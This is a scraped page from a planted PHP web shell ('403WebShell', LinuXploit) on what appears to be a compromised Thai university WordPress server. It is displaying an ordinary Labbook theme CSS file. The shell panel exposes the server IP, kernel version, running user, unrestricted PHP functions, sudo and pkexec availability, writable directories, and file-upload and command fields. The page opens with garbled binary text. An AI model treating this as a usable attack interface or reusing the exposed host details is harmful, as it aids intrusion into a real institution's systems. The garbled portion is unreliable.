h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/labbook/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/labbook/style-editor.css
/*
Theme Name: Labbook

Editor style.

*/

/* Sections
     ========================================================================== */


/**
 * Add margin to keep the add block button away from the edge.
 */

body {
    margin-left: 1em;
}

/**
 * Correct the font size and margin on `h1` elements within `section` and
 * `article` contexts in Chrome, Firefox, and Safari.
 */

h1 {
    font-size: 2em;
    margin: 0.67em 0;
}

/* Grouping content
     ========================================================================== */

/**
 * 1. Add the correct box sizing in Firefox.
 * 2. Show the overflow in Edge and IE.
 */

hr {
    box-sizing: content-box; /* 1 */
    height: 0; /* 1 */
    overflow: visible; /* 2 */
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */

pre {
    font-family: monospace, monospace; /* 1 */
    font-size: 1em; /* 2 */
}

/* Text-level semantics
     ========================================================================== */

/**
 * Remove the gray background on active links in IE 10.
 */

a {
    background-color: transparent;
}

/**
 * 1. Remove the bottom border in Chrome 57-
 * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari.
 */

abbr[title] {
    border-bottom: none; /* 1 */
    text-decoration: underline; /* 2 */
    text-decoration: underline dotted; /* 2 */
}

/**
 * Add the correct font weight in Chrome, Edge, and Safari.
 */

b,
strong {
    font-weight: bolder;
}

/**
 * 1. Correct the inheritance and scaling of font size in all browsers.
 * 2. Correct the odd `em` font sizing in all browsers.
 */

code,
kbd,
samp {
    font-family: monospace, monospace; /* 1 */
    font-size: 1em; /* 2 */
}

/**
 * Add the correct font size in all browsers.
 */

small {
    font-size: 80%;
}

/**
 * Prevent `sub` and `sup` elements from affecting the line height in
 * all browsers.
 */

sub,
sup {
    font-size: 75%;
    line-height: 0;
    position: relative;
    vertical-align: baseline;
}

sub {
    bottom: -0.25em;
}

sup {
    top: -0.5em;
}

/*--------------------------------------------------------------
# Typography
--------------------------------------------------------------*/
body,
button,
input,
select,
optgroup,
textarea {
    color: #404040;
    font-family: sans-serif;
    font-size: 85%;
    font-size: 0.85rem;
    line-height: 1.5;
}

h1, h2, h3, h4, h5, h6 {
    clear: both;
}

p {
    margin-bottom: 1.5em;
}

dfn, cite, em, i {
    font-style: italic;
}

blockquote {
    margin: 0 1.5em;
}

address {
    margin: 0 0 1.5em;
}

pre {
    background: #eee;
    font-family: "Courier 10 Pitch", Courier, monospace;
    font-size: 15px;
    font-size: 0.9375rem;
    line-height: 1.6;
    margin-bottom: 1.6em;
    max-width: 100%;
    overflow: auto;
    padding: 1.6em;
}

code, kbd, tt, var {
    font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
    font-size: 15px;
    font-size: 0.9375rem;
}

abbr, acronym {
    border-bottom: 1px dotted #666;
    cursor: help;
}

mark, ins {
    background: #fff9c0;
    text-decoration: none;
}

big {
    font-size: 125%;
}

/*--------------------------------------------------------------
# Elements
--------------------------------------------------------------*/

hr {
    background-color: #ccc;
    border: 0;
    height: 1px;
    margin: 1.5em 0;
    margin-left: auto;
    margin-right: auto;
    width: 25%; /* default block editor separator is short; related bug: https://github.com/WordPress/gutenberg/issues/10569 */
}

/* wide separator */
hr.is-style-wide {
    width: 75%;
}

/* dotted separator */
hr.is-style-dots {
    /* default to full width */
    width: 100%;
}

ul, ol {
    margin: 0 0 1.5em 3em;
}

ul {
    list-style: disc;
}

ol {
    list-style: decimal;
}

li > ul,
li > ol {
    margin-bottom: 0;
    margin-left: 1.5em;
}

dt {
    font-weight: bold;
}

dd {
    margin: 0 1.5em 1.5em;
}

table {
    margin: 0 0 1.5em;
    width: 100%;
}

/* END OF UNDERSCORES DEFAULTS */

/*--------------------------------------------------------------
# Labbook theme implementation
--------------------------------------------------------------*/

/* Default body font and size, used by ul, ol, etc. but not p nor headers */
body {
    font-family: sans-serif;
    font-size: 14px;
}

/* Style headers directly, as Gutenberg doesn't inherit body font size for these. */
h1 {
    font-family: sans-serif;
    font-size: 28px; /* 2.0 x body font size */
}

h2 {
    font-family: sans-serif;
    font-size: 21px; /* 1.5 x body font size */
    font-weight: 400;
    color: #252525;
}

h3 {
    font-family: sans-serif;
    font-size: 18.2px; /* 1.3 x body font size */
}

h4 {
    font-family: sans-serif;
    font-size: 14px; /* 1.0 x body font size */
}

h5 {
    font-family: sans-serif;
    font-size: 11.2px; /* 0.8 x body font size */
}

h6 {
    font-family: sans-serif;
    font-size: 9.8px; /* 0.7 x body font size */
}

/* Style some elements directory, as Gutenberg doesn't inherit body font size for these. */
p, textarea {
    font-size: 14px;
}

/** Special styling for post title, as done in Twentynineteen */
.editor-post-title__block .editor-post-title__input {
    font-family: sans-serif;
    font-weight: 400;
    color: #252525;
    font-size: 28px; /* same as h1, even though h2 is used in theme... weird Gutenberg behaviour */
}

/* Default link settings, overridden further down */
a, a:visited, a:hover, a:focus, a:active {
    color: #0b789c;
    text-decoration: none;
}

ul, ol {
    margin: 0 0 0.5em 0;
    padding-left: 2em;
}

li > ul,
li > ol {
    margin-bottom: 0;
    margin-left: 0;
}

a {
    color: #0b789c;
    border-bottom: #a8bfcf 1px solid;
    margin-bottom: 1px; /* compensate for 2px border on hover */
}

a:hover {
    border-bottom: #005a9c 2px solid;
    background-color:#efefef;
    margin-bottom: 0px; /* compensate for 2px border on hover */
}

a:focus {
    outline: thin dotted;
}

a:hover, a:active {
    outline: 0;
}

Youez - 2016 - github.com/yon3zu
LinuXploit